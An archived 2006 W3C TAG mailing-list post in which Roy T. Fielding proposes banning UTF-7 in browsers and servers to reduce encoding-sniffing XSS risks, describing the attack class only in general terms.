ban the use and implementation of UTF-7 from Roy T. Fielding on 2006-12-14 (www-tag@w3.org from December 2006)

From: Roy T. Fielding <fielding@gbiv.com>
Date: Thu, 14 Dec 2006 14:13:17 -0800
To: W3C TAG <www-tag@w3.org>
Message-Id: <9CDDAFDD-245F-4770-997B-AFEB8EC06C95@gbiv.com>

Over the years I have seen a number of security exploits that make
use of broken browsers that sniff character encodings in combination
with UTF-7 encoded tags or javascript commands.  I have never actually
seen anyone use UTF-7 for anything legitimate (other than testing).

Is there some reason why WWW clients need to support UTF-7?

It seems completely unnecessary given the now ubiquitous use of 8-bit
clean transports and the presence of UTF-8, which IIRC was defined
long after UTF-7.  However, the wider community may be aware of
some reason why browsers should support it, so I'd like to hear
your comments.

If there is no need for UTF-7, I'd like the TAG to consider it an
issue for the sake of asking browsers to remove its implementation
and banning its use by servers.

I know this won't solve any problems for deployed clients, and
wouldn't be an issue at all if servers used the same algorithm for
escaping characters that clients used to interpret them, but in the
long term it will simplify some checks for XSS attacks and I don't
think it will harm the Web.  That is, unless there is some significant
body of content out there that is encoded as UTF-7.

Cheers,

Roy T. Fielding                            <http://roy.gbiv.com/>
Chief Scientist, Day Software              <http://www.day.com/>

Received on Thursday, 14 December 2006 22:13:32 UTC